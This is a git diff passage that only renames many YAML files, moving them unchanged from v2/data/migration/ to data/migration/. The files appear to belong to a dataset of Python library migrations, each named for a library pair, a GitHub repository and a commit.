rename from v2/data/migration/pycryptodome__cryptography__cloudve@cloudbridge__27b217e.yaml
rename to data/migration/pycryptodome__cryptography__cloudve@cloudbridge__27b217e.yaml
diff --git a/v2/data/migration/pycryptodome__cryptography__coresecurity@pysap__21fe13a.yaml b/data/migration/pycryptodome__cryptography__coresecurity@pysap__21fe13a.yaml
similarity index 100%
rename from v2/data/migration/pycryptodome__cryptography__coresecurity@pysap__21fe13a.yaml
rename to data/migration/pycryptodome__cryptography__coresecurity@pysap__21fe13a.yaml
diff --git a/v2/data/migration/pycryptodome__cryptography__jvanovost@dc09_spt__08a9d0b.yaml b/data/migration/pycryptodome__cryptography__jvanovost@dc09_spt__08a9d0b.yaml
similarity index 100%
rename from v2/data/migration/pycryptodome__cryptography__jvanovost@dc09_spt__08a9d0b.yaml
rename to data/migration/pycryptodome__cryptography__jvanovost@dc09_spt__08a9d0b.yaml
diff --git a/v2/data/migration/pycryptodome__cryptography__leifj@pyxmlsecurity__b5d88c8.yaml b/data/migration/pycryptodome__cryptography__leifj@pyxmlsecurity__b5d88c8.yaml
similarity index 100%
rename from v2/data/migration/pycryptodome__cryptography__leifj@pyxmlsecurity__b5d88c8.yaml
rename to data/migration/pycryptodome__cryptography__leifj@pyxmlsecurity__b5d88c8.yaml
diff --git a/v2/data/migration/pycryptodome__cryptography__mitya57@secretstorage__e637c3b.yaml b/data/migration/pycryptodome__cryptography__mitya57@secretstorage__e637c3b.yaml
similarity index 100%
rename from v2/data/migration/pycryptodome__cryptography__mitya57@secretstorage__e637c3b.yaml
rename to data/migration/pycryptodome__cryptography__mitya57@secretstorage__e637c3b.yaml
diff --git a/v2/data/migration/pycryptodome__cryptography__ojarva@python-sshpubkeys__e3ee2d2.yaml b/data/migration/pycryptodome__cryptography__ojarva@python-sshpubkeys__e3ee2d2.yaml
similarity index 100%
rename from v2/data/migration/pycryptodome__cryptography__ojarva@python-sshpubkeys__e3ee2d2.yaml
rename to data/migration/pycryptodome__cryptography__ojarva@python-sshpubkeys__e3ee2d2.yaml
diff --git a/v2/data/migration/pycryptodome__cryptography__openstack@glance__5ebde90.yaml b/data/migration/pycryptodome__cryptography__openstack@glance__5ebde90.yaml
similarity index 100%
rename from v2/data/migration/pycryptodome__cryptography__openstack@glance__5ebde90.yaml
rename to data/migration/pycryptodome__cryptography__openstack@glance__5ebde90.yaml
diff --git a/v2/data/migration/pycryptodome__cryptography__openstack@keystonemiddleware__e23cb36.yaml b/data/migration/pycryptodome__cryptography__openstack@keystonemiddleware__e23cb36.yaml
similarity index 100%
rename from v2/data/migration/pycryptodome__cryptography__openstack@keystonemiddleware__e23cb36.yaml
rename to data/migration/pycryptodome__cryptography__openstack@keystonemiddleware__e23cb36.yaml
diff --git a/v2/data/migration/pycryptodome__cryptography__privacyidea@privacyidea__bcd8a45.yaml b/data/migration/pycryptodome__cryptography__privacyidea@privacyidea__bcd8a45.yaml
similarity index 100%
rename from v2/data/migration/pycryptodome__cryptography__privacyidea@privacyidea__bcd8a45.yaml
rename to data/migration/pycryptodome__cryptography__privacyidea@privacyidea__bcd8a45.yaml
diff --git a/v2/data/migration/pycryptodome__cryptography__rev112@pyope__48c294a.yaml b/data/migration/pycryptodome__cryptography__rev112@pyope__48c294a.yaml
similarity index 100%
rename from v2/data/migration/pycryptodome__cryptography__rev112@pyope__48c294a.yaml
rename to data/migration/pycryptodome__cryptography__rev112@pyope__48c294a.yaml
diff --git a/v2/data/migration/pycryptodome__cryptography__secdev@scapy__c24298b.yaml b/data/migration/pycryptodome__cryptography__secdev@scapy__c24298b.yaml
similarity index 100%
rename from v2/data/migration/pycryptodome__cryptography__secdev@scapy__c24298b.yaml
rename to data/migration/pycryptodome__cryptography__secdev@scapy__c24298b.yaml
diff --git a/v2/data/migration/pycryptodome__cryptography__spockbotmc@spockbot__4442170.yaml b/data/migration/pycryptodome__cryptography__spockbotmc@spockbot__4442170.yaml
similarity index 100%
rename from v2/data/migration/pycryptodome__cryptography__spockbotmc@spockbot__4442170.yaml
rename to data/migration/pycryptodome__cryptography__spockbotmc@spockbot__4442170.yaml
diff --git a/v2/data/migration/pycryptodome__cryptography__tgalal@python-axolotl__f74a936.yaml b/data/migration/pycryptodome__cryptography__tgalal@python-axolotl__f74a936.yaml
similarity index 100%
rename from v2/data/migration/pycryptodome__cryptography__tgalal@python-axolotl__f74a936.yaml
rename to data/migration/pycryptodome__cryptography__tgalal@python-axolotl__f74a936.yaml
diff --git a/v2/data/migration/pycryptodome__cryptography__twisted@twisted__e31995c.yaml b/data/migration/pycryptodome__cryptography__twisted@twisted__e31995c.yaml
similarity index 100%
rename from v2/data/migration/pycryptodome__cryptography__twisted@twisted__e31995c.yaml
rename to data/migration/pycryptodome__cryptography__twisted@twisted__e31995c.yaml
diff --git a/v2/data/migration/pycryptodome__pycryptodomex__azure@aztk__19dde42.yaml b/data/migration/pycryptodome__pycryptodomex__azure@aztk__19dde42.yaml
similarity index 100%
rename from v2/data/migration/pycryptodome__pycryptodomex__azure@aztk__19dde42.yaml
rename to data/migration/pycryptodome__pycryptodomex__azure@aztk__19dde42.yaml
diff --git a/v2/data/migration/pycryptodome__pycryptodomex__malwaredllc@byob__9291b54.yaml b/data/migration/pycryptodome__pycryptodomex__malwaredllc@byob__9291b54.yaml
similarity index 100%
rename from v2/data/migration/pycryptodome__pycryptodomex__malwaredllc@byob__9291b54.yaml
rename to data/migration/pycryptodome__pycryptodomex__malwaredllc@byob__9291b54.yaml
diff --git a/v2/data/migration/pycryptodome__pycryptodomex__snemes@malware-analysis__02b064b.yaml b/data/migration/pycryptodome__pycryptodomex__snemes@malware-analysis__02b064b.yaml
similarity index 100%
rename from v2/data/migration/pycryptodome__pycryptodomex__snemes@malware-analysis__02b064b.yaml
rename to data/migration/pycryptodome__pycryptodomex__snemes@malware-analysis__02b064b.yaml
diff --git a/v2/data/migration/pycurl__requests__tasmota@decode-config__5be6141.yaml b/data/migration/pycurl__requests__tasmota@decode-config__5be6141.yaml
similarity index 100%
rename from v2/data/migration/pycurl__requests__tasmota@decode-config__5be6141.yaml
rename to data/migration/pycurl__requests__tasmota@decode-config__5be6141.yaml
diff --git a/v2/data/migration/pycurl__requests__upstox@upstox-python__dce8760.yaml b/data/migration/pycurl__requests__upstox@upstox-python__dce8760.yaml
similarity index 100%
rename from v2/data/migration/pycurl__requests__upstox@upstox-python__dce8760.yaml
rename to data/migration/pycurl__requests__upstox@upstox-python__dce8760.yaml
diff --git a/v2/data/migration/pydotplus__pydot2__networkx@networkx__481f3e8.yaml b/data/migration/pydotplus__pydot2__networkx@networkx__481f3e8.yaml
similarity index 100%
rename from v2/data/migration/pydotplus__pydot2__networkx@networkx__481f3e8.yaml
rename to data/migration/pydotplus__pydot2__networkx@networkx__481f3e8.yaml
diff --git a/v2/data/migration/pydotplus__pydot2__trungdong@prov__acb9b05.yaml b/data/migration/pydotplus__pydot2__trungdong@prov__acb9b05.yaml
similarity index 100%
rename from v2/data/migration/pydotplus__pydot2__trungdong@prov__acb9b05.yaml
rename to data/migration/pydotplus__pydot2__trungdong@prov__acb9b05.yaml
diff --git a/v2/data/migration/pydotplus__pydot__mathics@mathics__915daeb.yaml b/data/migration/pydotplus__pydot__mathics@mathics__915daeb.yaml
similarity index 100%
rename from v2/data/migration/pydotplus__pydot__mathics@mathics__915daeb.yaml
rename to data/migration/pydotplus__pydot__mathics@mathics__915daeb.yaml
diff --git a/v2/data/migration/pyfits__astropy__glue-viz@glue__5b2d7f9.yaml b/data/migration/pyfits__astropy__glue-viz@glue__5b2d7f9.yaml
similarity index 100%
rename from v2/data/migration/pyfits__astropy__glue-viz@glue__5b2d7f9.yaml
rename to data/migration/pyfits__astropy__glue-viz@glue__5b2d7f9.yaml
diff --git a/v2/data/migration/pyfits__astropy__icrar@ngas__fa8b714.yaml b/data/migration/pyfits__astropy__icrar@ngas__fa8b714.yaml
similarity index 100%
rename from v2/data/migration/pyfits__astropy__icrar@ngas__fa8b714.yaml
rename to data/migration/pyfits__astropy__icrar@ngas__fa8b714.yaml
diff --git a/v2/data/migration/pyfits__astropy__spacetelescope@pysynphot__5b80ada.yaml b/data/migration/pyfits__astropy__spacetelescope@pysynphot__5b80ada.yaml
similarity index 100%
rename from v2/data/migration/pyfits__astropy__spacetelescope@pysynphot__5b80ada.yaml
rename to data/migration/pyfits__astropy__spacetelescope@pysynphot__5b80ada.yaml
diff --git a/v2/data/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__89c7afc.yaml b/data/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__89c7afc.yaml
similarity index 100%
rename from v2/data/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__89c7afc.yaml
rename to data/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__89c7afc.yaml
diff --git a/v2/data/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__a7f4c3f.yaml b/data/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__a7f4c3f.yaml
similarity index 100%
rename from v2/data/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__a7f4c3f.yaml
rename to data/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__a7f4c3f.yaml
diff --git a/v2/data/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__e5073e4.yaml b/data/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__e5073e4.yaml
similarity index 100%
rename from v2/data/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__e5073e4.yaml
rename to data/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__e5073e4.yaml
diff --git a/v2/data/migration/pyopenssl__cryptography__RIPE-NCC@ripe-atlas-sagan__f6fc10c.yaml b/data/migration/pyopenssl__cryptography__RIPE-NCC@ripe-atlas-sagan__f6fc10c.yaml
similarity index 100%
rename from v2/data/migration/pyopenssl__cryptography__RIPE-NCC@ripe-atlas-sagan__f6fc10c.yaml
rename to data/migration/pyopenssl__cryptography__RIPE-NCC@ripe-atlas-sagan__f6fc10c.yaml
diff --git a/v2/data/migration/pyopenssl__cryptography__celery@celery__9b39fc4.yaml b/data/migration/pyopenssl__cryptography__celery@celery__9b39fc4.yaml
similarity index 100%
rename from v2/data/migration/pyopenssl__cryptography__celery@celery__9b39fc4.yaml
rename to data/migration/pyopenssl__cryptography__celery@celery__9b39fc4.yaml
diff --git a/v2/data/migration/pyopenssl__cryptography__openstack@neutron-lbaas__bb34d71.yaml b/data/migration/pyopenssl__cryptography__openstack@neutron-lbaas__bb34d71.yaml
similarity index 100%
rename from v2/data/migration/pyopenssl__cryptography__openstack@neutron-lbaas__bb34d71.yaml
rename to data/migration/pyopenssl__cryptography__openstack@neutron-lbaas__bb34d71.yaml
diff --git a/v2/data/migration/pypcap__pcapy__openstack@steth__a981d2e.yaml b/data/migration/pypcap__pcapy__openstack@steth__a981d2e.yaml
similarity index 100%
rename from v2/data/migration/pypcap__pcapy__openstack@steth__a981d2e.yaml
rename to data/migration/pypcap__pcapy__openstack@steth__a981d2e.yaml
diff --git a/v2/data/migration/pyqt5__pyside2__catalystneuro@nwb-conversion-tools__a2ef335.yaml b/data/migration/pyqt5__pyside2__catalystneuro@nwb-conversion-tools__a2ef335.yaml
similarity index 100%
rename from v2/data/migration/pyqt5__pyside2__catalystneuro@nwb-conversion-tools__a2ef335.yaml
rename to data/migration/pyqt5__pyside2__catalystneuro@nwb-conversion-tools__a2ef335.yaml
diff --git a/v2/data/migration/pyqt5__pyside2__sanpen@gridcal__39a5dd9.yaml b/data/migration/pyqt5__pyside2__sanpen@gridcal__39a5dd9.yaml
similarity index 100%
rename from v2/data/migration/pyqt5__pyside2__sanpen@gridcal__39a5dd9.yaml
rename to data/migration/pyqt5__pyside2__sanpen@gridcal__39a5dd9.yaml
diff --git a/v2/data/migration/pyqt5__pyside6__toufool@auto-split__86244b6.yaml b/data/migration/pyqt5__pyside6__toufool@auto-split__86244b6.yaml
similarity index 100%
rename from v2/data/migration/pyqt5__pyside6__toufool@auto-split__86244b6.yaml
rename to data/migration/pyqt5__pyside6__toufool@auto-split__86244b6.yaml
diff --git a/v2/data/migration/pyquery__beautifulsoup4__idan@telostats__f73354a.yaml b/data/migration/pyquery__beautifulsoup4__idan@telostats__f73354a.yaml
similarity index 100%
rename from v2/data/migration/pyquery__beautifulsoup4__idan@telostats__f73354a.yaml
rename to data/migration/pyquery__beautifulsoup4__idan@telostats__f73354a.yaml
diff --git a/v2/data/migration/pyside2__qtpy__pypeit@pypeit__ba5e21a.yaml b/data/migration/pyside2__qtpy__pypeit@pypeit__ba5e21a.yaml
similarity index 100%
rename from v2/data/migration/pyside2__qtpy__pypeit@pypeit__ba5e21a.yaml
rename to data/migration/pyside2__qtpy__pypeit@pypeit__ba5e21a.yaml
diff --git a/v2/data/migration/python-ldap__ldap3__cloud-custodian@cloud-custodian__cbaf252.yaml b/data/migration/python-ldap__ldap3__cloud-custodian@cloud-custodian__cbaf252.yaml
similarity index 100%
rename from v2/data/migration/python-ldap__ldap3__cloud-custodian@cloud-custodian__cbaf252.yaml
rename to data/migration/python-ldap__ldap3__cloud-custodian@cloud-custodian__cbaf252.yaml
diff --git a/v2/data/migration/python-ldap__ldap3__ictu@quality-time__cc47b42.yaml b/data/migration/python-ldap__ldap3__ictu@quality-time__cc47b42.yaml
similarity index 100%
rename from v2/data/migration/python-ldap__ldap3__ictu@quality-time__cc47b42.yaml
rename to data/migration/python-ldap__ldap3__ictu@quality-time__cc47b42.yaml
diff --git a/v2/data/migration/python3-memcached__pymemcache__flan@staticdhcpd__0e64819.yaml b/data/migration/python3-memcached__pymemcache__flan@staticdhcpd__0e64819.yaml
similarity index 100%
rename from v2/data/migration/python3-memcached__pymemcache__flan@staticdhcpd__0e64819.yaml
rename to data/migration/python3-memcached__pymemcache__flan@staticdhcpd__0e64819.yaml
diff --git a/v2/data/migration/pytorch-pretrained-bert__pytorch-transformers__haoxizhong@pytorch-worker__fa8de77.yaml b/data/migration/pytorch-pretrained-bert__pytorch-transformers__haoxizhong@pytorch-worker__fa8de77.yaml
similarity index 100%
rename from v2/data/migration/pytorch-pretrained-bert__pytorch-transformers__haoxizhong@pytorch-worker__fa8de77.yaml
rename to data/migration/pytorch-pretrained-bert__pytorch-transformers__haoxizhong@pytorch-worker__fa8de77.yaml
diff --git a/v2/data/migration/pytorch-pretrained-bert__pytorch-transformers__kaushaltrivedi@fast-bert__1c96992.yaml b/data/migration/pytorch-pretrained-bert__pytorch-transformers__kaushaltrivedi@fast-bert__1c96992.yaml
similarity index 100%
rename from v2/data/migration/pytorch-pretrained-bert__pytorch-transformers__kaushaltrivedi@fast-bert__1c96992.yaml
rename to data/migration/pytorch-pretrained-bert__pytorch-transformers__kaushaltrivedi@fast-bert__1c96992.yaml
diff --git a/v2/data/migration/pytorch-pretrained-bert__pytorch-transformers__naver@claf__cffe499.yaml b/data/migration/pytorch-pretrained-bert__pytorch-transformers__naver@claf__cffe499.yaml
similarity index 100%
rename from v2/data/migration/pytorch-pretrained-bert__pytorch-transformers__naver@claf__cffe499.yaml
rename to data/migration/pytorch-pretrained-bert__pytorch-transformers__naver@claf__cffe499.yaml
diff --git a/v2/data/migration/pytorch-pretrained-bert__transformers__tiiiger@bert_score__04376e1.yaml b/data/migration/pytorch-pretrained-bert__transformers__tiiiger@bert_score__04376e1.yaml
similarity index 100%
rename from v2/data/migration/pytorch-pretrained-bert__transformers__tiiiger@bert_score__04376e1.yaml
rename to data/migration/pytorch-pretrained-bert__transformers__tiiiger@bert_score__04376e1.yaml
diff --git a/v2/data/migration/pytorch-transformers__transformers__allenai@abductive-commonsense-reasoning__abfeffc.yaml b/data/migration/pytorch-transformers__transformers__allenai@abductive-commonsense-reasoning__abfeffc.yaml
similarity index 100%
rename from v2/data/migration/pytorch-transformers__transformers__allenai@abductive-commonsense-reasoning__abfeffc.yaml
rename to data/migration/pytorch-transformers__transformers__allenai@abductive-commonsense-reasoning__abfeffc.yaml
diff --git a/v2/data/migration/pytorch-transformers__transformers__calclavia@story-generation__8954fad.yaml b/data/migration/pytorch-transformers__transformers__calclavia@story-generation__8954fad.yaml
similarity index 100%
rename from v2/data/migration/pytorch-transformers__transformers__calclavia@story-generation__8954fad.yaml
rename to data/migration/pytorch-transformers__transformers__calclavia@story-generation__8954fad.yaml
diff --git a/v2/data/migration/pytorch-transformers__transformers__huggingface@transfer-learning-conv-ai__16074b2.yaml b/data/migration/pytorch-transformers__transformers__huggingface@transfer-learning-conv-ai__16074b2.yaml
similarity index 100%
rename from v2/data/migration/pytorch-transformers__transformers__huggingface@transfer-learning-conv-ai__16074b2.yaml
rename to data/migration/pytorch-transformers__transformers__huggingface@transfer-learning-conv-ai__16074b2.yaml
diff --git a/v2/data/migration/pytorch-transformers__transformers__intellabs@nlp-architect__9f067f2.yaml b/data/migration/pytorch-transformers__transformers__intellabs@nlp-architect__9f067f2.yaml
similarity index 100%
rename from v2/data/migration/pytorch-transformers__transformers__intellabs@nlp-architect__9f067f2.yaml
rename to data/migration/pytorch-transformers__transformers__intellabs@nlp-architect__9f067f2.yaml
diff --git a/v2/data/migration/pytorch-transformers__transformers__jsybrandt@agatha__b570ef0.yaml b/data/migration/pytorch-transformers__transformers__jsybrandt@agatha__b570ef0.yaml
similarity index 100%
rename from v2/data/migration/pytorch-transformers__transformers__jsybrandt@agatha__b570ef0.yaml
rename to data/migration/pytorch-transformers__transformers__jsybrandt@agatha__b570ef0.yaml
diff --git a/v2/data/migration/pytorch-transformers__transformers__nvidia@nemo__7866512.yaml b/data/migration/pytorch-transformers__transformers__nvidia@nemo__7866512.yaml
similarity index 100%
rename from v2/data/migration/pytorch-transformers__transformers__nvidia@nemo__7866512.yaml
rename to data/migration/pytorch-transformers__transformers__nvidia@nemo__7866512.yaml
diff --git a/v2/data/migration/pytz__pendulum__oddluck@limnoria-plugins__2c40713.yaml b/data/migration/pytz__pendulum__oddluck@limnoria-plugins__2c40713.yaml
similarity index 100%
rename from v2/data/migration/pytz__pendulum__oddluck@limnoria-plugins__2c40713.yaml
rename to data/migration/pytz__pendulum__oddluck@limnoria-plugins__2c40713.yaml
diff --git a/v2/data/migration/pytz__pendulum__oddluck@limnoria-plugins__33c7a3f.yaml b/data/migration/pytz__pendulum__oddluck@limnoria-plugins__33c7a3f.yaml
similarity index 100%
rename from v2/data/migration/pytz__pendulum__oddluck@limnoria-plugins__33c7a3f.yaml
rename to data/migration/pytz__pendulum__oddluck@limnoria-plugins__33c7a3f.yaml
diff --git a/v2/data/migration/pyuserinput__pynput__activitywatch@aw-watcher-afk__297b58c.yaml b/data/migration/pyuserinput__pynput__activitywatch@aw-watcher-afk__297b58c.yaml
similarity index 100%
rename from v2/data/migration/pyuserinput__pynput__activitywatch@aw-watcher-afk__297b58c.yaml
rename to data/migration/pyuserinput__pynput__activitywatch@aw-watcher-afk__297b58c.yaml
diff --git a/v2/data/migration/pyyaml__oyaml__cronyo@cronyo__edd0cc6.yaml b/data/migration/pyyaml__oyaml__cronyo@cronyo__edd0cc6.yaml
similarity index 100%
rename from v2/data/migration/pyyaml__oyaml__cronyo@cronyo__edd0cc6.yaml
rename to data/migration/pyyaml__oyaml__cronyo@cronyo__edd0cc6.yaml
diff --git a/v2/data/migration/pyyaml__oyaml__gammapy@gammapy__848da63.yaml b/data/migration/pyyaml__oyaml__gammapy@gammapy__848da63.yaml
similarity index 100%
rename from v2/data/migration/pyyaml__oyaml__gammapy@gammapy__848da63.yaml
rename to data/migration/pyyaml__oyaml__gammapy@gammapy__848da63.yaml
diff --git a/v2/data/migration/pyyaml__ruamel.yaml__cloud-custodian@cloud-custodian__ee4d526.yaml b/data/migration/pyyaml__ruamel.yaml__cloud-custodian@cloud-custodian__ee4d526.yaml
similarity index 100%
rename from v2/data/migration/pyyaml__ruamel.yaml__cloud-custodian@cloud-custodian__ee4d526.yaml
rename to data/migration/pyyaml__ruamel.yaml__cloud-custodian@cloud-custodian__ee4d526.yaml
diff --git a/v2/data/migration/pyyaml__ruamel.yaml__common-workflow-language@cwltool__b9b65c0.yaml b/data/migration/pyyaml__ruamel.yaml__common-workflow-language@cwltool__b9b65c0.yaml
similarity index 100%
rename from v2/data/migration/pyyaml__ruamel.yaml__common-workflow-language@cwltool__b9b65c0.yaml
rename to data/migration/pyyaml__ruamel.yaml__common-workflow-language@cwltool__b9b65c0.yaml
diff --git a/v2/data/migration/pyyaml__ruamel.yaml__holgern@beem__f5ba90e.yaml b/data/migration/pyyaml__ruamel.yaml__holgern@beem__f5ba90e.yaml
similarity index 100%
rename from v2/data/migration/pyyaml__ruamel.yaml__holgern@beem__f5ba90e.yaml
rename to data/migration/pyyaml__ruamel.yaml__holgern@beem__f5ba90e.yaml
diff --git a/v2/data/migration/raven__sentry-sdk__agdsn@sipa__ea23791.yaml b/data/migration/raven__sentry-sdk__agdsn@sipa__ea23791.yaml
similarity index 100%
rename from v2/data/migration/raven__sentry-sdk__agdsn@sipa__ea23791.yaml
rename to data/migration/raven__sentry-sdk__agdsn@sipa__ea23791.yaml
diff --git a/v2/data/migration/raven__sentry-sdk__city-of-helsinki@respa__4fecb97.yaml b/data/migration/raven__sentry-sdk__city-of-helsinki@respa__4fecb97.yaml
similarity index 100%
rename from v2/data/migration/raven__sentry-sdk__city-of-helsinki@respa__4fecb97.yaml
rename to data/migration/raven__sentry-sdk__city-of-helsinki@respa__4fecb97.yaml
diff --git a/v2/data/migration/raven__sentry-sdk__etalab@udata__9bc0f73.yaml b/data/migration/raven__sentry-sdk__etalab@udata__9bc0f73.yaml
similarity index 100%
rename from v2/data/migration/raven__sentry-sdk__etalab@udata__9bc0f73.yaml
rename to data/migration/raven__sentry-sdk__etalab@udata__9bc0f73.yaml
diff --git a/v2/data/migration/raven__sentry-sdk__habitissimo@myaas__0a65bcc.yaml b/data/migration/raven__sentry-sdk__habitissimo@myaas__0a65bcc.yaml
similarity index 100%
rename from v2/data/migration/raven__sentry-sdk__habitissimo@myaas__0a65bcc.yaml
rename to data/migration/raven__sentry-sdk__habitissimo@myaas__0a65bcc.yaml
diff --git a/v2/data/migration/raven__sentry-sdk__kiwicom@the-zoo__e22070c.yaml b/data/migration/raven__sentry-sdk__kiwicom@the-zoo__e22070c.yaml
similarity index 100%
rename from v2/data/migration/raven__sentry-sdk__kiwicom@the-zoo__e22070c.yaml
rename to data/migration/raven__sentry-sdk__kiwicom@the-zoo__e22070c.yaml
diff --git a/v2/data/migration/raven__sentry-sdk__mozilla@addons-server__634c64f.yaml b/data/migration/raven__sentry-sdk__mozilla@addons-server__634c64f.yaml
similarity index 100%
rename from v2/data/migration/raven__sentry-sdk__mozilla@addons-server__634c64f.yaml
rename to data/migration/raven__sentry-sdk__mozilla@addons-server__634c64f.yaml
diff --git a/v2/data/migration/raven__sentry-sdk__onecodex@onecodex__120d961.yaml b/data/migration/raven__sentry-sdk__onecodex@onecodex__120d961.yaml
similarity index 100%
rename from v2/data/migration/raven__sentry-sdk__onecodex@onecodex__120d961.yaml
rename to data/migration/raven__sentry-sdk__onecodex@onecodex__120d961.yaml
diff --git a/v2/data/migration/raven__sentry-sdk__pokainc@cfn-cross-region-export__f1120d3.yaml b/data/migration/raven__sentry-sdk__pokainc@cfn-cross-region-export__f1120d3.yaml
similarity index 100%
rename from v2/data/migration/raven__sentry-sdk__pokainc@cfn-cross-region-export__f1120d3.yaml
rename to data/migration/raven__sentry-sdk__pokainc@cfn-cross-region-export__f1120d3.yaml
diff --git a/v2/data/migration/raven__sentry-sdk__samuelcolvin@aiohttp-toolbox__3b7a2a3.yaml b/data/migration/raven__sentry-sdk__samuelcolvin@aiohttp-toolbox__3b7a2a3.yaml
similarity index 100%
rename from v2/data/migration/raven__sentry-sdk__samuelcolvin@aiohttp-toolbox__3b7a2a3.yaml
rename to data/migration/raven__sentry-sdk__samuelcolvin@aiohttp-toolbox__3b7a2a3.yaml
diff --git a/v2/data/migration/raven__sentry-sdk__teamsempo@sempoblockchain__449990a.yaml b/data/migration/raven__sentry-sdk__teamsempo@sempoblockchain__449990a.yaml
similarity index 100%
rename from v2/data/migration/raven__sentry-sdk__teamsempo@sempoblockchain__449990a.yaml
rename to data/migration/raven__sentry-sdk__teamsempo@sempoblockchain__449990a.yaml
diff --git a/v2/data/migration/raven__sentry-sdk__thespaghettidetective@thespaghettidetective__b86b375.yaml b/data/migration/raven__sentry-sdk__thespaghettidetective@thespaghettidetective__b86b375.yaml
similarity index 100%
rename from v2/data/migration/raven__sentry-sdk__thespaghettidetective@thespaghettidetective__b86b375.yaml
rename to data/migration/raven__sentry-sdk__thespaghettidetective@thespaghettidetective__b86b375.yaml
diff --git a/v2/data/migration/raven__sentry-sdk__weasyl@weasyl__d10cb16.yaml b/data/migration/raven__sentry-sdk__weasyl@weasyl__d10cb16.yaml
similarity index 100%
rename from v2/data/migration/raven__sentry-sdk__weasyl@weasyl__d10cb16.yaml
rename to data/migration/raven__sentry-sdk__weasyl@weasyl__d10cb16.yaml
diff --git a/v2/data/migration/redis__aioredis__walletconnect@py-walletconnect-bridge__c2d3db2.yaml b/data/migration/redis__aioredis__walletconnect@py-walletconnect-bridge__c2d3db2.yaml
similarity index 100%
rename from v2/data/migration/redis__aioredis__walletconnect@py-walletconnect-bridge__c2d3db2.yaml
rename to data/migration/redis__aioredis__walletconnect@py-walletconnect-bridge__c2d3db2.yaml
diff --git a/v2/data/migration/requests-oauth2__oauthlib__mozilla@addons-server__5fd17b4.yaml b/data/migration/requests-oauth2__oauthlib__mozilla@addons-server__5fd17b4.yaml
similarity index 100%
rename from v2/data/migration/requests-oauth2__oauthlib__mozilla@addons-server__5fd17b4.yaml
rename to data/migration/requests-oauth2__oauthlib__mozilla@addons-server__5fd17b4.yaml
diff --git a/v2/data/migration/requests-oauth2__requests-oauthlib__getsentry@sentry__0bfe540.yaml b/data/migration/requests-oauth2__requests-oauthlib__getsentry@sentry__0bfe540.yaml
similarity index 100%
rename from v2/data/migration/requests-oauth2__requests-oauthlib__getsentry@sentry__0bfe540.yaml
rename to data/migration/requests-oauth2__requests-oauthlib__getsentry@sentry__0bfe540.yaml
diff --git a/v2/data/migration/requests-oauth2__requests-oauthlib__gunthercox@chatterbot__6c3b234.yaml b/data/migration/requests-oauth2__requests-oauthlib__gunthercox@chatterbot__6c3b234.yaml
similarity index 100%
rename from v2/data/migration/requests-oauth2__requests-oauthlib__gunthercox@chatterbot__6c3b234.yaml
rename to data/migration/requests-oauth2__requests-oauthlib__gunthercox@chatterbot__6c3b234.yaml
diff --git a/v2/data/migration/requests-oauth2__requests-oauthlib__sarumont@py-trello__ede0ceb.yaml b/data/migration/requests-oauth2__requests-oauthlib__sarumont@py-trello__ede0ceb.yaml
similarity index 100%
rename from v2/data/migration/requests-oauth2__requests-oauthlib__sarumont@py-trello__ede0ceb.yaml
rename to data/migration/requests-oauth2__requests-oauthlib__sarumont@py-trello__ede0ceb.yaml
diff --git a/v2/data/migration/requests-oauth2__requests__sybrenstuvel@flickrapi__c4f8d79.yaml b/data/migration/requests-oauth2__requests__sybrenstuvel@flickrapi__c4f8d79.yaml
similarity index 100%
rename from v2/data/migration/requests-oauth2__requests__sybrenstuvel@flickrapi__c4f8d79.yaml
rename to data/migration/requests-oauth2__requests__sybrenstuvel@flickrapi__c4f8d79.yaml
diff --git a/v2/data/migration/requests__aiohttp__aiortc@aiortc__d30c240.yaml b/data/migration/requests__aiohttp__aiortc@aiortc__d30c240.yaml
similarity index 100%
rename from v2/data/migration/requests__aiohttp__aiortc@aiortc__d30c240.yaml
rename to data/migration/requests__aiohttp__aiortc@aiortc__d30c240.yaml
diff --git a/v2/data/migration/requests__aiohttp__ictu@quality-time__d3a9a16.yaml b/data/migration/requests__aiohttp__ictu@quality-time__d3a9a16.yaml
similarity index 100%
rename from v2/data/migration/requests__aiohttp__ictu@quality-time__d3a9a16.yaml
rename to data/migration/requests__aiohttp__ictu@quality-time__d3a9a16.yaml
diff --git a/v2/data/migration/requests__aiohttp__keselekpermen69@userbutt__a2dd44e.yaml b/data/migration/requests__aiohttp__keselekpermen69@userbutt__a2dd44e.yaml
similarity index 100%
rename from v2/data/migration/requests__aiohttp__keselekpermen69@userbutt__a2dd44e.yaml
rename to data/migration/requests__aiohttp__keselekpermen69@userbutt__a2dd44e.yaml
diff --git a/v2/data/migration/requests__aiohttp__paradoxalarminterface@pai__fac6f80.yaml b/data/migration/requests__aiohttp__paradoxalarminterface@pai__fac6f80.yaml
similarity index 100%
rename from v2/data/migration/requests__aiohttp__paradoxalarminterface@pai__fac6f80.yaml
rename to data/migration/requests__aiohttp__paradoxalarminterface@pai__fac6f80.yaml
diff --git a/v2/data/migration/requests__aiohttp__raptor123471@dingolingo__1d8923a.yaml b/data/migration/requests__aiohttp__raptor123471@dingolingo__1d8923a.yaml
similarity index 100%
rename from v2/data/migration/requests__aiohttp__raptor123471@dingolingo__1d8923a.yaml
rename to data/migration/requests__aiohttp__raptor123471@dingolingo__1d8923a.yaml
diff --git a/v2/data/migration/requests__aiohttp__talkpython@async-techniques-python-course__a5c04bb.yaml b/data/migration/requests__aiohttp__talkpython@async-techniques-python-course__a5c04bb.yaml
similarity index 100%
rename from v2/data/migration/requests__aiohttp__talkpython@async-techniques-python-course__a5c04bb.yaml
rename to data/migration/requests__aiohttp__talkpython@async-techniques-python-course__a5c04bb.yaml
diff --git a/v2/data/migration/requests__aiohttp__talkpython@async-techniques-python-course__ab4e5fd.yaml b/data/migration/requests__aiohttp__talkpython@async-techniques-python-course__ab4e5fd.yaml
similarity index 100%
rename from v2/data/migration/requests__aiohttp__talkpython@async-techniques-python-course__ab4e5fd.yaml
rename to data/migration/requests__aiohttp__talkpython@async-techniques-python-course__ab4e5fd.yaml
